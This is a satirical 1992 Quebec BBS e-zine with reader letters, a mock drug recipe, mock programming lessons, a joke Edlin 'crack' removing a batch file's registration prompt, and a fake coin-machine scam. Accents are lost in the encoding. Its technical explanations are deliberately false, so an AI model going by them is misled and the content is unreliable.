Miroir, miroir Gna Gna Gna...
Flour Rider rpond:
Ceux qui disent a c'est parce qui sont jaloux parce qui connaissent rien
pentoute. Nous autres on est une MACHINE fake ecoeurez-nous pas.
------------------------------------------------------------------
Msg #: [178/186] Base: NPShit Support
Date : Tue 05 Jan 1992 07:34a Stat: Public
From : Sysop De Protovision
To : NpShit Staff
Title: hack-hack-hack
Tins ca l'air que je suis pus rendu tout seul a mettre mon nom dans toute les
T-PHILES pis les progs que je rammasse par dessus les vrai auteurs.
(c)Caillou Chanceux.
-----------------------------------
Bloody Steak rpond:
Ouin comme t'es pomal habitu de faire a, pourquoi tu te joindrais pas
nous?
------------------------------------------------------------------
Msg #: [179/186] Base: NPShit Support
Date : Tue 05 Jan 1992 3:02p Stat: Public
From : Most Of People
To : NpShit Staff
Title: Lamerz?
Bon j'ai lu la definition du mot lamer dans le NPShit #1.
Mais un gars qui Rip une texte file s'tu un lamer???
un Mutant Frosted
-----------------------------------
Bloody Steak rpond:
Ecoute selon Dental Flush, un Lamer s't'un ripper mais le mot ripper se
reporte seulement
des programmeurs. (Bonne dfaite n'est-ce pas?)
Par contre tu as parfaitement le droit de rire de nous
ce sujet et de nous
traiter de morons.
------------------------------------------------------------------
Msg #: [180/186] Base: NPShit Support
Date : Wed 06 Jan 1992 9:45a Stat: Public
From : Toys 'R' Us (Julie Villeneuve #0)
To : NpShit Staff
Title: suck-suck-suck
Wow les gars votre magazine est super. c'est trop hot. J'en rve la nuit.
J'aimerais tre votre leecheux officiel.
Zaknafein Mc'Craken
-----------------------------------
BEEf BRoTH rpond:
Merci. Nous recevons un nombre incalculable d'encouragements de nos nombreux
lecteurs (t'es le seul). Grce
vos encouragements, le magazine ne peut que
s'amliorer en matire de ridicule. En passant, nos 2 premires issues de
NPShit nous ont permis de prouver efficacement que le ridicule ne tue pas
(pas pour l'instant du moins).
Bloody Steak ajoute:
(En passant comme tu trouves le magazine super, pour toi ca va etre 25$, un
prix d'ami).
Gelatine Butcher meurt d'envie de te demander:
a te tenterait-tu d'ouvrir une section NPShit sur Amburger BBS? La seule
condition c'est d'avoir moins de 14 ans! Merci de nous leecher!
------------------------------------------------------------------
Msg #: [181/186] Base: NPShit Support
Date : Wed 06 Jan 1992 12:52p Stat: Public
From : >>Anonymous<<
To : NpShit Staff
Title: chu essoufler!
Chers NPShit, meme si ses le premiers numero, j'adore beaucoup
votre magazine. je peut pas croire que y peut avoir du monde qui
vous aimes pas c'est absurdre!!!!! moi je vous vois dans ma soupe
pis dans ma pisse le matin, pis meme quand je chie a me fait penser
vous-autres!!!!
-----------------------------------
Socks Yogurt Eater rpond:
On t'a reconnu, Blitzcrest, arrte de te lancer des fleurs en anonyme!
------------------------------------------------------------------
Msg #: [182/186] Base: NPShit Support
Date : Wed 06 Jan 1992 2:28p Stat: Public
From : IKEA-AC/DC
To : NpShit Staff
Title: hack en asm
NPShit, j'ai un problme
hacker un programme en assembleur.
Aidez-moi! - IKEA-Assembled Creature
-----------------------------------
Killer Ceiling Annihilator rpond:
Euh... Euh... Mon frre me dit que ton problme se situe peut-tre dans le
fait que les commentaires doivent toujours tre prcds d'un point-virgule.
En passant, flash ton pseudo! a te dirait-tu d'embarquer dans NPShit?
(Surtout que tu serais le seul qui connatrait l'assembleur!)
------------------------------------------------------------------
Msg #: [183/186] Base: NPShit Support
Date : Wed 06 Jan 1992 3:16p Stat: Public
From : Cramix
To : NpShit Staff
Title: Eeeeh...
ouin a flasherait que vous preniez MAZg pour faire NPShit... tk a serait
pomal plus beau non?
}Cramix{
---
þ BustTag þ Use }MOCCO{ or die, sucker!
-----------------------------------
Atreid Bavtron rpond:
Penses-tu! C'est ben trop compliqu
utiliser MAZg! Pis
part de a c'est
mme pas faite en VGA. C'est pour a qu'on prend des text files.
Pis en passant pour ton magazine Alt-PrintScreen, a parle pas pantoute
des mmes affaires! Nous autres premirement nos textes on est srs qu'ils
sont bons vu qu'on les prend dans des revues amricaines pis qu'on les
traduit aprs.
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Je me cale, tu me cales, on me cale, vous me calez, je change de handle.
COMMENT CHANGER DE HANDLE
un autre article intelligent de votre tinami
DENTAL FLUSH
C'est quand votre rputation est
terre qu'il est temps de changer de
handle pour se refaire une autre vie. Maintenant, o trouver le handle
convenant
votre personnalit? L
est la question.
La meilleure place, c'est dans l'univers ambiant. Les noms de l'espace,
style Capitaine Picouille, sont passs date et dnotent une jeunesse
accrue et un penchant pour Star Trek. Evitez aussi de prendre votre
handle dans un groupe de musique, parce que si jamais vous voulez
embarquer dans NpShit, va falloir que je change mon avis sur ce genre
de handle.
Ce que je suggre, c'est de pogner votre handle dans la circulaire
Provigros et d'ajouter un mot style-hot dedans:
Liste de mots style-hot
Killer Destroy
Blood Suffocation
Ugly Fire
Incinerator Mad
Cutter Snoopy
A prsent, explorons les combinaisons possibles. Avec le mot KLEENEX
(qui est justement en spcial cette semaine) on peut former le handle
"Kleenex of Suffocation". Un handle de ce style-l
dnote une personne
sre d'elle mettons, avec eee... beaucoup d'argent, et un gros rhube
probablement.
D'autres exemples de combinaisons fuckes avec leur signi-
fication en franais pour vous aider:
Ugly Sausage Saucisse Dgueulasse
Chocolate Incinerator Incinrateur de Chocolat
Fire Rice Riz de Feu
Mad Oil Huile Mchante
Blood Sauce Sauce de Sang
Oats Cutter Coupeur de Gruau
Killer Apple Pomme Tueuse (Orange Mcanique Part II)
Microwave Snoopy Snoopy Micro-Ondable
Vous voyez comment c'est facile d'avoir l'air hot
mes yeux! Il se
peut que vous vous fassiez rire de vous par certains users de boards
publix, mais vous savez trs bien qu'il est impossible qu'un user de
board publix ait raison sur quelque sujet que ce soit.
Plus loin dans ce magazine il y aura un autre article de moi. Il est
vident que vous allez le lire. Aprs tout, c'est un article de moi.
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
SHiT DrUGz
ToDAY: lA PLaSTiCiNe!
par Coaxial Karpette!
Bon, coeurs sensibles abstenez-vous ou bouchez-vous les yeux, cette droye
est trs nocive, dangereuse et prise dans la revue U.S.Drugs.
Cette droye est faite de PLASTIC!! a destroy donc pas
peu prs et mme
un peu plus! On peut la fumer, la sniffer, la piquer, la bouffer, et la
blaster (J'ai pris ce mot l
dans la revue, mais je catch pas pantoute
ce que a veut dire.) Tk, ses ingrdients sont trs faciles, pis je vais
vous les crire tu-suite, le temps que je sorte mon dictionnaire.
1 morceau de plastique (Comme celui de votre camion Tonka par
exemple, sur lequel vous pouvez faire un prlvement)
1 cuillerre
table de cannabis (Vous trouverez a dans tous
les bons Perrette!)
1 tasse de farine Robin Hood
1 seringue pleine d'eau comme celle que vous vous servez dans
votre bain, mais avec une aiguille
2 couteaux (Je me demande ben pourquoi)
1 pole au propane (Probablement pour la faire cuire!)
1 sac de guimauves (C'est mon initiative: y est pas crit dans
la revue, mais c'est bon au boutte!)
1 paquet de branches (pour les guimauves)
Bon... Astheure que vous avez trouv tous ces ingrdients sans vous faire
arrter ou interner, commenons le mlange. Faire cuire le morceau de
plastique au four
350 degrs farenheit jusqu'
bullition. Saupoudrer
de cannabis et de farine. Tamiser. Pour 3
5 personnes.
PS: Si vous faites un bad trip, faites une plainte
Air-Drug. (Ceux qui
font la pub "Vous allez voler comme vous n'avez jamais vol, et on va vous
voler comme vous vous aurez jamais fait voler.")
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Le Mot du mdium
par le mdium (je vois pas qui
part a!)
Les rencontres du 1er type, c'est de voir une soucoupe volante. Le 2eme
type, c'est quand elle atterrit. Le 3eme type c'est quand des
extra-terrestres en sortent. Mais saviez-vous qu'une rencontre du 4eme
type survient quand un extra-terrestre devient collaborateur pour
NPShit?
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
LA CHRONIQUE MENSUELLE SUR LA PROGRAMMATION
By Peanut Butter
Comme vous le savez srement (on s'en vante tellement!), nous, les
OFFICIERS de la MACHINE NPShit, sommes les meilleurs en absolument tout,
surtout en programmation. Nous avons dcid, nous les DIEUX de
l'INFORMATIQUE, de vous faire profiter de notre immense rserve de
connaissances en programmation en vous montrant quelques algorithmes
demandant un effort crbral particulirement intense pour tre bien
assimils.
P.S. Si vous lisez cette rubrique, envoyez-nous 30$ parce que les listings
sont copyright.
P.S. Si vous ne comprenez pas les listings, envoyez-nous 30$, nous vous
enverrons la T-phile anglaise originale.
P.S. Si vous comprenez les listings envoyez-nous 30$ et appelez-nous
pour nous les expliquer.
P.S. Dans tout autre cas, envoyez-nous 30$ pareil.
LECON #1:
Assignation d'une valeur
une variable en BASIC.
Listing 1:
10 A=7
A premire vue, cela semble trs complexe..... Mais ne vous en faites pas,
les officiers de NPShit avec leur cerveau suprieur ont compris ce listing
(aprs de nombreuses heures de dur labeur).
10 signifie le numro de la ligne, A est la variable, 7 est la valeur.
Le plus compliqu rside dans l'usage du '=', plusieurs personnes font
l'erreur d'crire 10=A 7 (cela m'arrive trs souvent), une erreur
aussi frquente est d'crire 10=A=7 (cela m'arrive encore plus souvent).
Bref, l'assignation d'une variable en BASIC est trs complique pour des
dbutants comme vous (c'est pas comme nous) donc, si vous avez des
assignations
faire, envoyez-nous vos variables, vos valeur et nous vous
renverrons le listing moyennant une contribution de 30$.
LECON #2
Programmation en Assembleur pour programmeurs tres avancs (officiers NPShit).
Listing 2:
MOV AX,0
Cette instruction a pour but de mettre la valeur de AX dans la valeur 0.
Comme le 0 est en fait gal a AX, cela bloque l'IRQ externe de la
LED du PRINTSCREEN LOCK en maskant le chip secondaire de la master switch 6048
avec la valeur du dernier CLUSTER de l'EMS 2 watt interne au priphrique
RESET multipli par le QI total du staff de NPShit.
Comme vous voyez, nous maitrisons parfaitement l'Assembleur.
Si dans un programme, vous avez besoin de l'instruction MOV, envoyez 30$
la machine NPShit, mais c'est pas sur que nous vous enverrons un listing.
LECON #3
Programmation d'un SCROLL vertical de qualit professionnelle.
Nous utiliserons pour faire ce scroll un langage tres performant
(c'est pour ca que nous, la machine NPShit, utilisons seulement ce langage)
THE............. BATCH FILE LANGUAGE Version 5.00
Pour commencer le programme, vous devez taper au prompt
C:\>COPY CON SCROLL.NPS <enter>
Voici le listing:
@ECHO OFF
ECHO.
ECHO.
ECHO NOUS
ECHO.
ECHO.
ECHO SOMMES
ECHO.
ECHO.
ECHO LES
ECHO.
ECHO.
ECHO MEILLEURS
ECHO.
ECHO.
ECHO (c)Caillou Chanceux
ECHO.
<CTRL-Z>
Pour le faire runner, vous devez taper:
C:\>TYPE SCROLL.NPS
Puis, quand le texte apparait, vous faites plusieurs fois <ENTER> cela va
faire scroller le texte vers le haut (scroll interactif).
Cette mthode de scroll interactif a t entirement dveloppe par les
officiers de la machine NPShit. Personne n'avait jusqu'alors pens a faire un
scroll aussi.......... gnial. Cette mthode permet
l'utilisateur de faire
scroller le texte
la vitesse qu'il le veut selon sa rapidit
user son
piton <ENTER>.
P.S. Avec un petit 30$, NPShit vous enverra 2 outils essentiels pour la
programmation en BATCH FILE, soit:
BCOMP.EXE pour compiler vos Batch files, ainsi que
BLINK.EXE pour linker vos batch files.
Pense du Jour #1 : Envoyez 30$ aux officiers de la machine NPShit
Pense du Jour #2 : Criss que le monde est FISH...........NPShit
FatFreePAL
Peanut Butter
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
CHRONIQUE PROGRAMMATION AVANCEE
COMMENT FAIRE UN DEMO
par Bloody Steak
Le langage qui offre les meilleures possibilits pour un Demo est sans aucun
doute le GWBASIC. Ce langage (bien que trs complexe) possde plusieurs
commandes des plus sophistiques (CIRCLE, LINE, BOX). N'est-ce pas
merveilleux?!
PS: Pour comprendre le reste de ce texte, nous vous conseillons de lire
le texte sur l'assignation d'une variable en GWBASIC.
Le reste du texte ne s'adresse qu'
des personnes matrisant parfaitement
le GWBASIC.
10 PRINT "MON PREMIER DEMO (GRACE A NPSHIT)"
20 SCREEN 0 ' (0 = QUOTIENT INTELLECTUEL DE FAIRY COMPST)
' Si un jour vous comprenez cette valeur, expliquez nous la.
30 LINE (0, 0) - (4000, -20), 69
' Bon maintenant une vraie ligne complexe...
' le 0, 0 indique srement la couleur.
' le 4000 reprsente peut-tre la mmoire utilise?!
' Quant au -20 c'est la probabilit que cette ligne-l
marche
' le 69 c'est la position des lignes.
40 CIRCLE (2000, 0), 682, 5150
' Bon cette ligne-l
je comprends rien pantoute fake laissez moi le temps
' d'inventer quekchose pour que j'aille l'air hot en programmation.
' Bon le 2000 c'est le nombre de membres sur Galactwit BBS (Notre Gros HQ).
' Le 0 c'est le nombre d'usagers brillants sur Galactwit.
' Le 682-5150 c'est justement le # de Galactwit; normalement les cercles
' devraient logiquement former les chiffres du numro du BBS.
50 END
' Maudite marde, encore un mot anglais, bon dans le dictionnaire y disent
' que a veut dire FAIM. Ah ben oui je check l'heure pis y'est 6:00pm, m'a
' aller souper.
Cet exemple est vraiment des plus complexes, mais afin de vous aider, nous
offrons pour une dure limite un cours d'introduction au GWBASIC au cot de
-> 50$ <- la minute. A ce prix-l
c'est une aubaine.
Les seules personnes autorises de NPSHIT
se rendre chez vous pour vous
montrer le GWBASIC sont (Bloody Steak, Peanut Butter, BEEf BRoTH et Killer
Ceiling Annihilator)
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
J'lite, je flash, j'allume, chu beau, chu intelligent, vous tes une
gang de cons.
QU'EST-CE QU'UN ELITE?
By Dental Flush
Vous connaissez dsormais ma vision du mot Mailer et du nom Dahlen.
Mais la y'en a qui exagrent, nyah nyah chu plus lite que toi, moi je
suis un vrai lite, vous-autres vous tes des immitations en in-tock, pis
moi je fais partie d'un club d'lite ou bien moi je suis tireur d'lite.
Mais NpShit est ici pour vous renseigner, pour justifier quelle est la
vraie signification du mot lite. Les seuls qui peuvent se faire appeler
lite, ce sont les membres de NpShit. Nous sommes les seuls ayant les
qualits ncessaires. Bref nous sommes les meilleurs. Et vous tes des
nobodies. Le but c'est que vous devez nous respecter et nous vnrer.
Dans le prochain numro de NpShit, je vous sortirai encore un texte
stupide, ayant pas rapport, et dpourvu de toute vracit (comme
mon
habitude) mais qui devrait soulever les foules!
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
D o S H A C k S
COMMENT HACKER UNE BATCH FILE
par BEEf BRoTH
Une batch file? Ca l'air compliqu pour rien, mais nous allons
essayer de mettre un peu d'ordre dans vos ides. J'ai bien dit essayer
parce que dans l'fond j'ai ben d'la misre
traduire les textes anglais
qu'on pogne aux Etats.
Ok. Bon. Ok fait que d'abord vous devez savoir qu'une batch file
ca peut tre excut. Pour cela, on doit d'abord obtenir le nom de la
batch file et la taper. J'espre que vous savez faire a sinon cessez de
lire notre magazine, on est ben trop intelligent pour vous.
Une batch file, a s'excute ligne par ligne, en ordre. Si vous
voulez voir le contenu d'une batch, vous avez la possibilit de voir ce
qu'elle fait si vous l'excutez. Mais certains programmeurs expriments
en batch file comme notre dieu de la batch (Loocif Hair) mettent des
protections qui nous empchent de voir le contenu lorsqu'excute.
Pour a on doit se munir de Batch Debugger++ 3.0. Mais si vous
l'avez pas vous pouvez quand mme utiliser Edlin, qui joue un petit peu le
rle de Debug. En fait Edlin est beaucoup plus puissant que Debug, c'est
pourquoi nous allons travailler avec celui-ci. Justement, pour les amateurs
d'environnement graphique, MicroSoft vient de sortir une version d'Edlin
pour Windows 3.1.
1- D'abord vous trouvez une batch que vous dsirez hacker.
2- Ensuite, vous devez excuter Edlin, avec comme ligne de com-
mande le nom de la batch.
Exemple:
C:\DOS>edlin telemate.bat
3- Une batch c'est un programme en langage cobol qui est comp-
ress par PKLite en code C, mais comme si y'avait un inter-
prteur de segment qui stackait les interruptions de la clock.
Pour ca vous devez vous assurer que vous pointez sur le bon
cylindre, parce que vous savez tous que si vous utilisez
HIMEM.SYS, il est possible que le DOS rentre en conflit avec
la carte de la souris au moment de passer
la modification
des adresses du speaker. (Un speaker c'est la puce qui sert
changer l'errorlevel des pixels de votre clavier)
Quoi qu'il en soit, vous devez maintenant lister la mmoire
afin de voir les commandes qui vont s'excuter.
La Syntaxe:
End of input file
*1l<Enter>
* c'est le prompt.
'1' c'est l'adresse en mmoire, elle est compose comme ceci:
(256 * le Segment) + l'Offset. Pis 'l' c'est pour lister
partir de cette adresse.
Vous aurez comme rsultat:
1:*@echo off
2: echo TMBoot v15.8á par Loocif Hair
3: echo (C) Copyright 1987,1988,1989,1990,1991,1992
4: echo Tous droits rservs
5: echo .
6: echo Veuillez enregistrer ce programme.
7: pause
8: c:
9: cd\telemate
10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9
11: cd\
4- Le but du hack, c'est de modifier la source pour faire chier
l'auteur pis lui faire des menaces de sortir une version de
sa batch plus rcente. Mais maintenant, grce
NpShit vous
pourrez faire chier tout le monde.
Pour se faire, vous devez identifier les mots
effacer ou
changer. Mettons que vous voulez changer le nom de
l'auteur par le vtre.
Donc on change la ligne de l'adresse 2. L
a devient comp-
liqu. Vous signalez
edlin l'adresse
modifier.
*2<Enter>
* c'est le prompt. Faut tout le temps rpter.
'2' c'est l'adresse. J'viens de le dire.
Vous verrez alors:
2:*echo TMBoot v15.8á par Loocif Hair
2:*_
'_', c'est le curseur.
5- Vous devez retaper le texte crit en haut, ou tout simplement
le modifier. Vous devez cependant
tout prix rcrire la
commande echo sinon il est dangereux que votre batch ne marche
pas. Cette commande est trs complique, mais si nous avons la
chance de tomber sur un texte amricain qui l'explique, nous
ferons un numro spcial pour vous montrer ca. Supposons que
j'cris:
2:*echo TMBoot v15.8á par Loocif Hair
2:*ecko tmboute v 17,9 fabriquer et distribuer par le beste cra
queur du quebec: BEEf BRoTH<enter>
6- Vous retournerez au prompt *.
Le but c'est d'enlever la petite pause pis la note qui dit d'en-
registrer le programme. Pour ca vous devez toute retapper le
programme. Une petite liste pour voir ou nous en sommes:
*1l<Enter> (vous vous souvenez que le 1 c'est l'adresse pis
le l c'est la commande de liste)
1: @echo off
2:*ecko tmboute v 15,9 fabriquer et distribuer par le beste cra
queur du quebec: BEEf BRoTH
3: echo (C) Copyright 1987,1988,1989,1990,1991,1992
4: echo Tous droits rservs
5: echo .
6: echo Veuillez enregistrer ce programme.
7: pause
8: c:
9: cd\telemate
10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9
11: cd\
La note est
la ligne 6. Nous retapperons le programme a partir
de la ligne o nous pouvons retrouver 'c:'. Donc tapez 6 pour
diter la ligne:
*6<enter>
6:*echo Veuillez enregistrer ce programme.
6:*_
La vous dcalez le programme:
6:*echo Veuillez enregistrer ce programme.
6:*c:
Vous rptez cette opration pour les lignes suivantes.
*7<enter>
7:*pause
7:*sd/talemaite
*8<enter>
8:*c:
8:*tm /1 $2 #4 ^7
(Coudonc c'est quoi a? a doit etre une commande pour cracker
Telemate)
Voyons. Aprs a donc quoi qui faut faire. En tout cas, tout
a semble fonctionner
merveille. Pour s'en assurer, listons.
1: @echo off
2:*ecko tmboute v 15,9 fabriquer et distribuer par le beste cra
queur du quebec: BEEf BRoTH
3: echo (C) Copyright 1987,1988,1989,1990,1991,1992
4: echo Tous droits rservs
5: echo .
6: c:
7: sd/talemaite
8:*tm /1 $2 #4 ^7
9: cd\telemate
10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9
11: cd\
7- Le rsultat que vous attendiez tous, je suppose. Vous devez
recompiler la source batch. Pour ca vous donnez le numro de
la premire et de la dernire ligne que vous dsirez conserver
avec la commande d. Nous n'avons plus besoin des lignes a partir
de 9. Vous procdez de cette faon:
*1,8d<Enter>
8- Finalement, vous devez enregistrer vos modifications avec la
commande q. Il vous demande une question que j'ai pas encore
russi
comprendre, mais j'ai su de source sre d'un colla-
borateur mexicain que a voulait dire "Etes-vous sur?" fait
que fions-nous
lui.
*q<Enter>
Abort edit (Y/N)? y
9- Vous tes maintenant prt
tester votre oeuvre. Si jamais
les modifications que vous avez faites ne semblent pas avoir
t enregistres, je suppose que c'est normal parce que j'ai
jamais russi
tester la batch que je viens de faire. Nous
autres on est ben bons pour crire des affaires qu'on sait
mme pas si a marche.
J'espre tout de mme que j'ai russi
tendre le champs de vos
connaissances.
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
COMMENT FOURRER UNE MACHINE
A CENNES
Comme vous le savez, il y a un truc trs SIMPLE et facile pour
fourrer une machine
0.25$.
Pour ce faire, vous devez tout d'abord prendre une "piasse" (voir
billet en papier qui sert de monnaie d'change). Pour commencer, vous
dchirez la piasse de bord en bord par le centre (Attention, cela doit tre
fait en plein centre de la piasse, utilisez une rgle). Un coup que ceci est
fait, vous devriez avoir maintenant 2 ti-bouttes de piasse. Ensuite vous
virez un ct de bord (Peu importe lequel). Ensuite vous le recollez avec
du "scotch tape". Aprs a vous virez la piasse (maintenant recolle) du ct
de la reine (dans le cas d'un 2$). Vous devez utiliser un crayon Bic bleu
pointe fine pour faire une tite moustache
la reine (style Hitler). Ensuite,
pliez la piasse en 2 dans le sens du long.
Aprs coup, prenez un Exacto (faites attention pour ne pas vous
couper, la gang de NPShit n'est pas responsable des accidents) et dcoupez
soigneusement le petit 2 (dans le cas d'un 2$ bien sr) en haut
gauche
(Important, il ne faut pas dpasser). Ensuite prenez un lighter ou un briquet
(
votre choix) et brlez le coin oppos (juste un ti-peu). Bon vous avez
enfin fini le massacre. Essayez-le maintenant. Si ca marche pas, ben je suis
dsol de vous apprendre que cette petite exprience vient de vous coter 2$
(toujours dans le cas d'un 2$). Si ca marche, c'est probablement que vous
n'avez pas suivi les instructions
la lettre, ou je ne comprends pas.....
Je suis dsol.....
Explosive Banana
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
